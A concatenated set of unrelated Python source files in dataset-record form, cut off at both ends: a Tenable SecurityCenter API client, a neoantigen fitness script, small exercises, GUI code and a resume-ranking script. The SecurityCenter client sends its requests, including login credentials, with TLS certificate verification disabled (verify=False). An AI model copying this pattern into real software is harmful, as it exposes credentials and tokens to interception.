verify=False)\n else:\n r = requests.get(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n\n if r.status_code != 200:\n e = r.json()\n print(e['error_msg'])\n sys.exit()\n\n return r\n\n\n def login(self, uname, pword):\n \"\"\" Logs into SecurityCenter and retrieves our token and cookie.\n We create a seperate header here since we do not have a X-SecurityCenter token yet.\"\"\"\n headers = {'Content-Type':'application/json'}\n login = {'username': uname, 'password':pword}\n self.username = uname;\n self.password = pword;\n\n # We use the connect function and pass it a POST method, /rest/token resource,\n # and our login credentials as data. We also pass our headers from above for this function.\n # if the credentials fails to get token sys.exit will be called. \n data = self.connect('POST', '/rest/token', data=login, headers=headers)\n\n # We can pull the cookie out of our data object and store it as a variable.\n self.cookie = data.cookies\n\n # We can alo pull our token out from the returned data as well.\n self.token = data.json()['response']['token']\n return (self.cookie, self.token)\n\n # ------ UNCOMMENT THE CODE BELOW TO ENABLE THE FUNCTION. THIS WAS LEFT IN FOR REFERENCE. ------ #\n # ------ LINES WITH '##' ARE COMMENTS, YOU DO NOT NEED TO UNCOMMENT THOSE LINES. ------ #\n def get_assets(self):\n # Initiate an empty asset list.\n assets = []\n\n # Use the connect function with a GET method and /rest/asset resource.\n data = self.connect('GET', '/rest/asset')\n\n # Store the manageable assets in the results variable.\n results = data.json()['response']['manageable']\n\n # If results is empty, there are no manageable assets and the script exits.\n if not results:\n sys.exit(\"This user has no managed assets.\")\n else:\n # For each asset in our results file, append the asset ID to our asset list.\n for i in results:\n assets.append(i['id'])\n return assets\n\n def get_asset_by_id(self, id):\n #Get the asset group by its id. The ID should be a number\n data = self.connect('GET', '/rest/asset/{0}'.format(id))\n \n results = data.json()['response'];\n \n if not results:\n sys.exit(\"no managed assets\")\n else: \n return results;\n \n def update_hosts_by_asset_id(self, id, hosts_ips):\n #Post the hosts private IPs to the asset identified by ID\n #hosts_ips is an array of ips. \n patch_records = {'definedIPs' : ', '.join(hosts_ips)};\n \n data = self.connect('PATCH', '/rest/asset/{0}'.format(id), patch_records)\n results = data.json()['response'];\n \n if not results:\n sys.exit(\"No response from patch operation\");\n else:\n return results;\n \n def get_analysis_by_id(self, scanId): \n #Post the hosts with a commmand to get analysis by scanID. \n #scanID is an integer of the scan. \n\n begin_offset = 0;\n end_offset = 50;\n totalRecords = 50;\n totalRecordsIsValid = False;\n allAnalysisRecords = [];\n scanIDStr = str(scanId)\n\n\n while (begin_offset < totalRecords):\n query_data = {\n \"query\": {\n \"createdTime\":0,\n \"modifiedTime\":0,\n \"groups\":[],\n \"type\":\"vuln\",\n \"tool\":\"sumid\",\n \"sourceType\":\"individual\",\n \"startOffset\":begin_offset,\n \"endOffset\":end_offset,\n \"filters\":[],\n \"sortColumn\":\"severity\",\n \"sortDirection\":\"desc\",\n \"scanID\": scanIDStr, \n \"view\": \"all\"\n },\n \"sourceType\": \"individual\",\n \"scanID\": scanIDStr,\n \"sortField\": \"severity\",\n \"sortDir\": \"desc\",\n \"columns\":[],\n \"type\":\"vuln\"\n };\n\n data = self.connect('POST', '/rest/analysis', query_data);\n results = data.json()['response'];\n\n if (totalRecordsIsValid == False): \n #update totalRecords count once and only once\n totalRecords = results['totalRecords']\n totalRecords = int(totalRecords)\n totalRecordsIsValid = True; \n #print 'totalRecords: ' + totalRecords\n\n returnedRecordsCount = results['returnedRecords']\n #print 'returnedRecordsCount: ' + str(returnedRecordsCount);\n\n returnedRecords = results['results'];\n #print 'first record: ' + str(returnedRecords[0])\n allAnalysisRecords.extend(returnedRecords);\n begin_offset += returnedRecordsCount; \n #print 'begin_offset: ' + str(begin_offset)\n end_offset += returnedRecordsCount;\n #print 'end_offset: ' + str(end_offset)\n\n if not results: \n sys.exit(\"No response from patch operation\");\n \n return allAnalysisRecords\n\n def get_respository_fields(self): \n # this function apparently pulls the repository data. \n # this data will subsequently be used to construct a statement for acceptRiskRule API\n \n query_string = { 'fields' : 'name,description,type,dataFormat,modifiedTime,vulnCount,ipCount,typeFields'};\n encoded_query_string = urllib.urlencode(query_string)\n data = self.connect('GET', '/rest/repository'+ '?' + encoded_query_string);\n results = data.json()['response']\n\n return results;\n\n\n def acceptRiskSingleItem(self, pluginId, comments, expiration_date, hostType, name, repositories): \n query_data = {\n \"comments\": comments,\n \"expires\": expiration_date, #mockup, the real value is the epoch time of the date. \n \"hostType\": \"all\", #mockup\n #\"name\": \"RHEL-06-000019 - There must be no .rhosts or hosts.equiv files on the system - ~/.rhosts.\", #mockup \n \"name\": name,\n \"newSeverity\": {\n \"id\": 3\n },\n \"plugin\": {\n \"id\": str(pluginId)\n },\n \"port\": \"0\",\n \"protocol\": 6,\n \"repositories\": repositories\n }\n\n data = self.connect('POST', '/rest/acceptRiskRule', query_data)\n\n result = data.json()['response']\n\n return result;\n\n def postAcceptRiskSingleItem(self, query_data): \n data = self.connect('POST', '/rest/acceptRiskRule', query_data);\n result = data.json()['response'];\n return result;\n\n def transformRepositoriesForAcceptRisk(self, resposRawData):\n transformedReposArray = [];\n for repo in resposRawData : \n transformedRepo = {\n \"context\": \"\",\n \"correlation\": [],\n \"createdTime\": None, #-1 is for forever, transform to EpochTime for date/month/year\n \"dataFormat\": \"IPv4\",\n \"description\": repo[\"description\"],\n \"id\": repo[\"id\"],\n \"ipRange\": repo[\"typeFields\"][\"ipRange\"],\n \"modifiedTime\": repo[\"modifiedTime\"],\n \"name\": repo[\"name\"],\n \"organizations\": [],\n \"status\": None,\n \"trendWithRaw\": repo[\"typeFields\"][\"trendWithRaw\"],\n \"trendingDays\": repo[\"typeFields\"][\"trendingDays\"],\n \"type\": repo[\"type\"]\n }\n\n transformedReposArray.append(transformedRepo);\n\n return transformedReposArray\n\n \n #todo: take one line single item of vulnerabilty, get the respositories, fill it in the vuln request, \n # get the date, put in the date. \n","sub_path":"SC5API.py","file_name":"SC5API.py","file_ext":"py","file_size_in_byte":9418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320438446","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 6 13:44:15 2018\n\n@author: hashemk\n\"\"\"\n\nfrom Aligner import Aligner\nfrom Neoantigen import Neoantigen\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n\n\ndef immuno_app():\n\n \n test_xml_fname = '../pyFitnessNeoantigen/neoantigens_AL4602_iedb.xml'\n neo_fname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/InputData/neoantigens_Rizvi.txt'\n aln_dname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/InputData/neoantigen_alignments_Rizvi'\n fitness_output_fname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/MyTestOutput/neoantigens_Rizvi_fitness.txt'\n a = 26\n k = 4.86936\n eps = 1e-5\n \n \n [neoantigens, samples] = read_neoantigens(neo_fname)\n# [neoantigens, samples] = read_neoantigens_old(neo_fname)\n \n aligner = Aligner()\n for s in samples:\n xml_path = aln_dname + \"/neoantigens_\" + s + \"_iedb.xml\"\n# print(xml_path)\n aligner.read_blastp_xml(xml_path)\n aligner.compute_R(a= a, k=k)\n \n \n \n \n output_f = open(fitness_output_fname, 'w')\n header = ['NeoantigenID', 'Mutation', 'Sample', 'mtPosition', 'ResidueChangeClass', 'mtPeptide', 'wtPeptide', 'Excluded', 'A', \n 'R', 'Recognition_Potential', 'WtToMt_R_Ratio', 'allele', 'HLA']\n header = '\\t'.join(header)\n output_f.write(header+'\\n')\n \n for nid in neoantigens.keys():\n neo = neoantigens[nid]\n W = neo.get_weight() # excludes neoantigens that mutated from nonhydorphobic residue on position 2 or 9\n A = neo.get_A()\n mtpeptide = neo.mtPeptide #mutant peptide\n wtpeptide = neo.wtPeptide\n neo_mut_full_id = 'MUT_' + str(nid) + '_' + neo.coord \n neo_wt_full_id = 'WT_' + str(nid) + '_' + neo.coord \n \n \n R_mt = aligner.get_R(neo_mut_full_id) \n R_wt = aligner.get_R(neo_wt_full_id)\n fitness = A * R_mt * W\n \n A_wt_to_A_mt_log_ratio = np.log10( (R_wt + eps) / (R_mt+ eps) ) # eps to prevent dividing by zeros\n \n \n residue_change = neo.residue_change\n w = neo.get_weight()\n excluded = 1-w\n l = [nid, neo.coord, neo.sample, neo.position, residue_change, mtpeptide, wtpeptide, excluded, A, R_mt, \n fitness, A_wt_to_A_mt_log_ratio, neo.allele, neo.HLA]\n l = '\\t'.join(map(lambda s: str(s), l))\n output_f.write(l+'\\n')\n output_f.close()\n \n \n\n\n\ndef read_neoantigens(neo_fname):\n neoantigens = dict()\n neo_df = pd.read_csv(neo_fname, sep='\\t')\n print(neo_df.shape)\n \n # filter out rows for which the column 7 (MT.Score) is not defined\n neo_df = neo_df[neo_df.iloc[: , 7] != None]\n num_neos = neo_df.shape[0]\n for i in range(num_neos):\n one_row = np.array(neo_df.iloc[i, :])\n neoantigen = Neoantigen(one_row)\n neoantigens[neoantigen.id] = neoantigen\n neoantigen.set_A()\n samples = set(map(lambda neo: neo.get_sample_name(), neoantigens.values()))\n return([neoantigens, samples])\n\n \ndef read_neoantigens_odl(neo_fname):\n neoantigens = dict()\n \n f = open(neo_fname)\n header = f.readline()\n htab = header.strip().split('\\t')\n print(htab)\n \n hdict = dict()\n \n for i in range(0, len(htab)):\n hdict[htab[i]] = i\n line = f.readline()\n while line:\n line = line.strip()\n nparams = line.split('\\t')\n if nparams[7] == 'NA':\n line = f.readline()\n continue\n neoantigen = Neoantigen(nparams)\n neoantigens[neoantigen.id] = neoantigen\n neoantigen.set_A()\n line = f.readline()\n f.close()\n samples = set(map(lambda neo: neo.get_sample_name(), neoantigens.values())) \n \n return([neoantigens, samples])\n \n\nif __name__ == '__main__':\n immuno_app()","sub_path":"pyEpitope/pyImmunogenecity/immunogenecity_main.py","file_name":"immunogenecity_main.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138350536","text":"num = []\na = 0\nohno = input(\"To find the sum and average of a string of numbers please key in the number seperated by a space: \")\nnum = ohno.split()\nsum = 0\ncount = 0\nfor i in range(len(num)):\n a = int(num[i])\n sum += a\n count += 1\navg = sum/count\nprint(\"The sum of number is: {}, the average is: {:.2f}\".format(sum,avg)) \n","sub_path":"Early Assignments/A2/A2Q1.py","file_name":"A2Q1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540322398","text":"\nimport argparse\nfrom ctapipe.utils import get_dataset_path\n\nfrom lstchain.reco import dl0_to_dl1\nfrom lstchain.reco import dl1_to_dl2\nfrom lstchain.visualization import plot_dl2\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser(description = \"Train Random Forests.\")\n\n# Required argument\nparser.add_argument('--gammafile', '-fg', type=str,\n dest='gammafile',\n help='path to the dl1 file of gamma events for training',\n )\n\nparser.add_argument('--protonfile', '-fp', type=str,\n dest='protonfile',\n help='path to the dl1 file of proton events for training',\n )\n\nparser.add_argument('--storerf', '-srf', action='store', type=bool,\n dest='storerf',\n help='Boolean. True for storing trained RF in 3 files'\n 'Deafult=False, any user input will be considered True',\n default=False)\n\nparser.add_argument('--datafile', '-f', type=str,\n dest='datafile',\n help='path to the file with simtelarray events',\n default=get_dataset_path('gamma_test_large.simtel.gz'))\n\nparser.add_argument('--storeresults', '-s', action='store', type=bool,\n dest='storeresults',\n help='Boolean. True for storing the reco dl2 events'\n 'Default=False, any user input will be considered True',\n default=False)\n\n# Optional arguments\nparser.add_argument('--opath', '-om', action='store', type=str,\n dest='path_models',\n help='Path to store the resulting RF',\n default='./results/')\n\nparser.add_argument('--outdir', '-or', action='store', type=str,\n dest='outdir',\n help='Path where to store the reco dl2 events',\n default='./results/')\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n \n #Train the models\n \n features = ['intensity',\n 'time_gradient',\n 'width',\n 'length',\n 'wl',\n 'phi',\n 'psi']\n\n reg_energy, reg_disp, cls_gh = dl1_to_dl2.build_models(args.gammafile,\n args.protonfile,\n features,\n save_models=args.storerf,\n path_models=args.path_models,\n )\n\n #Get out the data from the Simtelarray file:\n \n data = dl0_to_dl1.get_events(args.datafile, False)\n\n \n #Apply the models to the data\n dl2 = dl1_to_dl2.apply_models(data, features, cls_gh, reg_energy, reg_disp)\n \n if args.storeresults==True:\n #Store results\n if not os.path.exists(args.outdir):\n os.mkdir(args.outdir)\n outfile = args.outdir + \"/dl2_events.hdf5\"\n dl2.to_hdf(outfile, key=\"dl2_events\", mode=\"w\")\n\n #Plot some results\n \n plot_dl2.plot_features(dl2)\n plt.show()\n plot_dl2.plot_E(dl2)\n plt.show()\n plot_dl2.plot_disp(dl2)\n plt.show()\n plot_dl2.plot_pos(dl2)\n plt.show()\n\n","sub_path":"scripts/lstpipe.py","file_name":"lstpipe.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200205703","text":"\"\"\"\nUtility Classes\n\"\"\"\n\nimport sys\nimport collections\n\n# From https://github.com/benjaminp/six/blob/master/six.py\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\nstring_types = str\nfrom io import StringIO\n\n# https://stackoverflow.com/questions/16176742/python-3-replacement-for-deprecated-compiler-ast-flatten-function\n\n\ndef flatten(x):\n result = []\n\n for el in x:\n if isinstance(x, collections.Iterable) and not isstr(el):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n\n\ndef isstr(s):\n return isinstance(s, str)\n\n\nclass _KwargParser:\n \"\"\"\n Helper function to emulate Python 3 keyword-only arguments.\n\n Use as::\n\n def func(x1, **kwargs):\n kw = KwargParser('func', kwargs)\n a = kw.pop('a')\n b = kw.pop('b', 2)\n kw.reject_remaining()\n ...\n\n To emulate the Python 3 syntax::\n\n def func(x1, *, a, b=2):\n ...\n \"\"\"\n def __init__(self, func_name, kwargs):\n self._func_name = func_name\n self._kwargs = kwargs\n\n def pop(self, arg_name, *default):\n try:\n return self._kwargs.pop(arg_name, *default)\n except KeyError:\n pass\n raise TypeError(\n '{}() missing required keyword-only argument {!r}'\n .format(self._func_name, arg_name)\n )\n\n def reject_remaining(self):\n if self._kwargs:\n # match the error message to what Python 3 produces\n bad_arg = next(iter(self._kwargs))\n raise TypeError(\n '{}() got an unexpected keyword argument {!r}'\n .format(self._func_name, bad_arg)\n )\n","sub_path":"galgebra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"444415935","text":"import pip\nimport pkg_resources\nimport click\nimport sys\n\nfrom floyd.log import logger as floyd_logger\nfrom conda import cli as conda_cli\n\n\nPROJECT_NAME = \"floyd-cli\"\n\n\ndef pip_upgrade():\n pip.main([\"install\", \"--upgrade\", PROJECT_NAME])\n\n\ndef conda_upgrade():\n conda_cli.main(\"install\", \"-y\", \"-c\", \"floydhub\", \"-c\", \"conda-forge\", \"floyd-cli\")\n\n\n@click.command()\ndef version():\n \"\"\"\n Prints the current version of the CLI\n \"\"\"\n version = pkg_resources.require(PROJECT_NAME)[0].version\n floyd_logger.info(version)\n\n\n@click.command()\ndef upgrade():\n \"\"\"\n Upgrade floyd command line\n \"\"\"\n try:\n if 'conda' in sys.version or 'ontinuum' in sys.version:\n conda_upgrade()\n else:\n pip_upgrade()\n except Exception as e:\n floyd_logger.error(e)\n","sub_path":"floyd/cli/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"6240073","text":"from django.conf.urls import url\nfrom possiblebug.views import PublisherAutocomplete, AuthorAutocomplete\nfrom possiblebug import views\n\nurlpatterns = [\n\n\n url(\n r'^author-autocomplete/$',\n AuthorAutocomplete.as_view(),\n name='author-autocomplete',\n ),\n url(\n r'^publisher-autocomplete/$',\n PublisherAutocomplete.as_view(),\n name='publisher-autocomplete',\n ),\n\n url(r'^test/$', views.add_new_book, name=\"test\"),\n\n]","sub_path":"test_project/possiblebug/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482928025","text":"# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom MainWindow import Ui_MainWindow\n\nclass View(QtWidgets.QMainWindow):\n\n # Конструктор, створює базове представлення та пов'язує\n # Інтерфейс с Пред'явником\n def __init__(self, Presenter, Model, parent=None):\n super(QtWidgets.QMainWindow, self).__init__(parent)\n self.Presenter = Presenter\n self.Model = Model\n # Створення базового GUI\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.tableCoef.cellChanged.connect(self.validate_cell)\n self.ui.tableFree.cellChanged.connect(self.validate_cell)\n self.ui.comboVarNumber.currentIndexChanged.connect(self.Presenter.change_varnum)\n self.ui.buttonGenerate.clicked.connect(self.Presenter.generate)\n self.ui.buttonSolveSystem.clicked.connect(self.Presenter.solve)\n self.n = 6\n self.ui.buttonSolveSystem.setDisabled(True)\n\n # Метод, що змінює Представлення у разі зміни моделі\n def model_changed(self, n=None, A=None, b=None):\n # Зміна таблиць та шрифту, якщо змінено розмір\n if n:\n self.ui.tableCoef.setRowCount(n)\n self.ui.tableCoef.setColumnCount(n)\n self.ui.tableFree.setRowCount(n)\n self.ui.tableVariables.setRowCount(n)\n self.n = n\n if n == 2:\n self.font = QtGui.QFont(\"Arial\", 27)\n elif n == 3:\n self.font = QtGui.QFont(\"Arial\", 24)\n elif n == 4:\n self.font = QtGui.QFont(\"Arial\", 21)\n elif n == 5:\n self.font = QtGui.QFont(\"Arial\", 18)\n elif n == 6:\n self.font = QtGui.QFont(\"Arial\", 15)\n # Заміна елементів у разі зміни СЛАУ (A і b)\n # Зміна шрифту у разі зміни розміру\n for i in range(self.n):\n if b:\n item = QtWidgets.QTableWidgetItem(str(b[i]))\n self.ui.tableFree.setItem(i, 0, item)\n else:\n item = self.ui.tableFree.item(i, 0)\n if item and n:\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n for j in range(self.n):\n if A:\n item = QtWidgets.QTableWidgetItem(str(A[i][j]))\n self.ui.tableCoef.setItem(i, j, item)\n else:\n item = self.ui.tableCoef.item(i, j)\n if item and n:\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n\n # Перевірка на коректність введених даних\n # У разі помилки виводить повідомлення\n # Інакше передає управління Пред'явнику\n def validate_cell(self, row, column):\n table_sender = self.sender()\n table_name = 0 if table_sender.columnCount() == 1 else 1\n item = table_sender.item(row, column)\n def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n if item:\n text = item.text()\n text = text.strip()\n if text == '':\n item.setText('')\n self.ui.buttonSolveSystem.setDisabled(True)\n self.Presenter.clear_variables()\n elif not is_number(text):\n QtWidgets.QMessageBox.warning(self, \"Помилка вводу!\", \"У матриці мають бути лише числа!\")\n item.setText('')\n self.ui.buttonSolveSystem.setDisabled(True)\n self.Presenter.clear_variables()\n else:\n self.Presenter.change_cell(row, column, table_name, float(text))\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n item.setText(text)\n\n # Встановлення таблиці змінних і інформації про час виконання\n def set_variables(self, X, eps, t):\n self.ui.tableVariables.setMaximumWidth(80 + eps * 15)\n for i in range(self.n):\n item = QtWidgets.QTableWidgetItem(str(round(X[i], eps)))\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n self.ui.tableVariables.setItem(i, 0, item)\n t = str(round(t * 100, 3))\n self.ui.labelInfo.setText(\"Система розв'язана за \" + t + \" мс.\")\n\n\n\n\n","sub_path":"View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198039685","text":"def create_intervals(data):\n \"\"\"\n Create a list of intervals out of set of ints.\n \"\"\"\n if len(data) == 0:\n return []\n if len(data) == 1:\n return [data[0],data[0]]\n out = []\n d = sorted(data)\n\n curr_lower = d[0]\n curr_upper = 0\n for i in range(1, len(d)):\n if d[i]-1 == d[i-1]:\n curr_upper = d[i]\n if i == len(d)-1:\n out.append((curr_lower, curr_upper))\n else:\n out.append((curr_lower, d[i-1]))\n curr_lower = d[i]\n if i == len(d)-1:\n out.append((curr_lower, d[-1]))\n\n return sorted(list(set(out)))\n\n\n# if __name__ == '__main__':\n# # These \"asserts\" using only for self-checking and not necessary for auto-testing\n# assert create_intervals({1, 2, 3, 4, 5, 7, 8, 12}) == [\n# (1, 5), (7, 8), (12, 12)], \"First\"\n# assert create_intervals({1, 2, 3, 6, 7, 8, 4, 5}) == [(1, 8)], \"Second\"\n# print('Almost done! The only thing left to do is to Check it!')\n\nprint(create_intervals([]), \"WHAT SHOULD BE THE RESULT\")\nprint(create_intervals({1, 2, 3, 4, 5, 7, 8, 12}), [(1, 5), (7, 8), (12, 12)])\nprint(create_intervals({1, 2, 3, 6, 7, 8, 4, 5}), [(1, 8)])\n","sub_path":"python/create-intervals.py","file_name":"create-intervals.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"73701353","text":"\"\"\" prinzipiell völlig richtig, lösbar in Zeit aber nur durch Einbau von C \"\"\"\nfrom collections import deque\nfrom sys import stdin, stdout\ninput = stdin.readline\nprin = stdout.write\nt = int (input ())\nfor _ in range (t):\n n, m = map (int, input ().split ())\n a = deque ([0]) + deque ([int (x) for x in input ().split ()])\n d = deque ([-1 for _ in range (len (a))])\n b = deque ([0]) + deque ([int (x) for x in input ().split ()])\n for i in range (1, m + 1):\n for j in range (i, n + 1, i):\n if a [j] < b [i] and d [j] == -1: d [j] = i\n d.popleft ()\n for h in d:\n prin (str (h) + \"\\n\")\n\"\"\"\nimport subprocess\nimport os\nfrom sys import stdin,stdout\nwith open(\"code.c\",\"w\") as f:\n f.write(r'''\n #include\n #include\n int main()\n {\n int t;\n scanf(\"%d\",&t);\n while(t--)\n {\n int n,m;\n scanf(\"%d%d\",&n,&m);\n int *arr = (int *)malloc(sizeof(int)*(n+1)),*brr = (int *)malloc(sizeof(int)*(m+1));\n int *crr = (int *)malloc(sizeof(int)*(n+1));\n for(int i=1;i<=n;i++)\n {\n scanf(\"%d\",&arr[i]);\n crr[i]=-1;\n }\n for(int i=1;i<=m;i++)\n {\n scanf(\"%d\",&brr[i]);\n }\n for(int i=1;i<=m;i++)\n {\n for(int j=i;j<=n;j+=i)\n if(brr[i]>=arr[j] && crr[j]==-1)\n crr[j]=i;\n }\n for(int i=1;i<=n;i++)\n printf(\"%d\\n\",crr[i]);\n free(arr);\n free(brr);\n free(crr);\n }\n \n return 0;\n }\n ''')\nsubprocess.check_output(['gcc','code.c','-o','code'])\nprocess = subprocess.Popen(['./code'],stdin=stdin,stdout=subprocess.PIPE)\nprint(process.communicate()[0].decode())\n\"\"\"\n","sub_path":"hackercup_quali/hackerearth/health_of_person.py","file_name":"health_of_person.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531128551","text":"def how_many_days(year_start, year_end):\n\tif year_start > year_end: return 0\n\tdef add_up(year, d):\n\t\tr = year % d - 1\n\t\tif r < 0: return r + d\n\t\telse: return r\n\ttotal_years = year_end - year_start + 1\n\tfour_div_years = (total_years + add_up(year_start, 4)) // 4\n\th_div_years = (total_years + add_up(year_start, 100)) // 100\n\tfh_div_years = (total_years + add_up(year_start, 400)) // 400\n\tlunar_years = four_div_years - h_div_years + fh_div_years\n\treturn (total_years - lunar_years) * 365 + lunar_years * 366\n\nimport sys\nr = sys.stdin.readline\n\ncy, cm, cd = map(int, r().split())\nny, nm, nd = map(int, r().split())\n\nif ny - cy >= 1000:\n\tif nm > cm or nm == cm and nd > cd or nm == cm and nd == cd:\n\t\tprint(\"gg\")\n\t\tsys.exit(0)\n\ndays_dict = {\n\t1:31,\n\t2:28,\n\t3:31,\n\t4:30,\n\t5:31,\n\t6:30,\n\t7:31,\n\t8:31,\n\t9:30,\n\t10:31,\n\t11:30,\n\t12:31,\n}\n\ndef is_lunar(year):\n\tif how_many_days(year, year) == 366:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef date_value_inclusive(y, m, d):\n\tbef = how_many_days(1, y-1)\n\tfor i in range(1,m): bef += days_dict[i]\n\tif m > 2 and is_lunar(y):\n\t\tbef += 1\n\treturn bef + d\n\ndef one_day_small(y,m,d):\n\tif d == 1:\n\t\tif m == 1:\n\t\t\ty -= 1\n\t\t\tm, d = 12, 31\n\t\telse:\n\t\t\tm -= 1\n\t\t\tif m == 2 and is_lunar(y): d = 29\n\t\t\telse: d = days_dict[m]\n\telse:\n\t\td -= 1\n\treturn y, m, d\n\t\ncy, cm, cd = one_day_small(cy, cm, cd)\nny, nm, nd = one_day_small(ny, nm, nd)\nprint(\"D-{}\".format(date_value_inclusive(ny,nm,nd)-date_value_inclusive(cy,cm,cd)))","sub_path":"1000/01308_baekjoon.py","file_name":"01308_baekjoon.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292661097","text":"class QueryBuilder:\n def __init__(self, query, strings):\n \"\"\"Constructor of the class. Creates the attributes of the class and checks\n if the constraints are respected (see doc).\n Inputs :\n :query: A list containing strings. Corresponds to the query the user wants to do.\n This arguments must match the constraints of the \"Sparse Arrays\" problem (see doc).\n :strings: A list containing strings. Corresponds to the array the user wants to search into.\n This arguments must match the constraints of the \"Sparse Arrays\" problem (see doc).\n \"\"\"\n\n # Checks if the constraints are respected for the two inputs\n for arg_name, arg_value in {\"query\": query, \"strings\": strings}.items():\n # List type constraint\n if not isinstance(arg_value, (list, tuple)):\n raise TypeError(\"The argument \" + arg_name + \" has type \" + str(type(arg_value)) + \".\"\n + \" List or tuple was expected.\")\n if not 1 <= len(arg_value) <= 1000:\n raise TypeError(\"The argument \" + arg_name + \" has length \" + str(len(arg_value)) + \".\"\n + \" Expected a length between 1 and 1000.\")\n\n for i in range(len(arg_value)):\n # String type constraint\n if type(arg_value[i]) is not str:\n raise TypeError(\"Index \" + str(i) + \" of \" + arg_name\n + \" has type \" + str(type(arg_value[i])) + \".\"\n + \" String was expected.\")\n # Length of the strings constraint\n if not 1 <= len(arg_value[i]) <= 20:\n raise ValueError(\"Index \" + str(i) + \" of \" + arg_name\n + \" has \" + str(len(arg_value[i])) + \" characters.\"\n + \" Expected a length between 1 and 20.\")\n\n\n # Set the attributes\n self.query = query\n self.strings = strings\n\n def search(self):\n\n \"\"\"Searches for the number of occurrences of each queries in the strings attribute.\n Returns :\n :query_result: A dictionary with {string_query : string_occurrence}\n \"\"\"\n\n query_results = dict()\n\n for q in self.query:\n # Computes the number of occurrence of the query q in the input collection\n occurrence = self.strings.count(q)\n query_results[q] = occurrence\n\n return query_results\n","sub_path":"app/sparse_arrays.py","file_name":"sparse_arrays.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245226759","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport warnings\nimport textract\nimport traceback\nimport extractEntities as entity\nfrom gensim.summarization import summarize\nimport PyPDF2\nimport jsonGetCategory as skills\nfrom extract_exp import ExtractExp\nfrom striprtf.striprtf import rtf_to_text\nfrom pathlib import Path\nimport json\nimport boto3\nfrom time import gmtime, strftime\nimport shutil\n\nfrom functools import partial\nimport dask\nfrom dask.diagnostics import ProgressBar\nimport numpy as np\nfrom multiprocessing import Process,Manager\n\n\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\n\nglobal rootpath\nglobal bucket_name\nbucket_name = 'resume-rank-bucket' \nrootpath = \"resume-rank-bucket\"\nglobal pathSeprator\npathSeprator = '/'\n\nclass ResultElement:\n def __init__(self, jd, filename,totalExp, phoneNo, email, exp,\n finalRank,skills,nonTechskillList,min_qual,is_min_qual,candidateName,isJobTitlePresent,badWords):\n self.jd = jd\n self.filename = filename\n self.totalExp = totalExp\n self.phoneNo = phoneNo\n self.email = email\n self.exp = exp\n self.finalRank = finalRank\n self.primarySkills = skills\n self.softSkills = nonTechskillList\n self.min_qual = min_qual\n self.is_min_qual = is_min_qual\n self.candidateName = candidateName\n self.isJobTitlePresent = isJobTitlePresent\n self.badWords = badWords\n \n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\ndef getfilepath(loc):\n temp = str(loc)\n temp = temp.replace('\\\\', '/')\n return temp\n\ndef _s3_download(s3,bucket_name,path_to_read_file,i):\n try:\n s3.Bucket(bucket_name).download_file(i,path_to_read_file)\n \n except Exception as e:\n print(e)\n\ndef threaded_process(resume_chunk,final_path,jobfile,skillset,min_qual,jd_exp,resumePath,flask_return,must_have_skill,job_title,\n jd_weightage,skill_weightage,min_qual_weightage,non_tech_weightage,exp_weightage,soft_skill=\"\",programming_skill=\"\"):\n\n not_found = 'Not Found'\n extract_exp = ExtractExp()\n\n \n for count,j in enumerate(resume_chunk):\n resume_text = \"\"\n temp_path = j.rsplit('/',1)\n i = final_path+pathSeprator+temp_path[1]\n Temp = i.rsplit('.',-1)\n \n if Temp[1] == \"pdf\" or Temp[1] == \"Pdf\" 